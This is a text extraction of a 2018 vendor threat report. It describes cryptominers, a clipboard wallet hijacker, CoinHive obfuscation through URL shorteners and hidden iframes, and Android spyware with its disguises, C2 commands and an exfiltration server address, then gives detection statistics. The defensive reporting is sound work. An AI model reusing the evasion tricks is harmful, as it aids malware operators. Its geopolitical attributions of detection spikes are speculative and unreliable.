33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
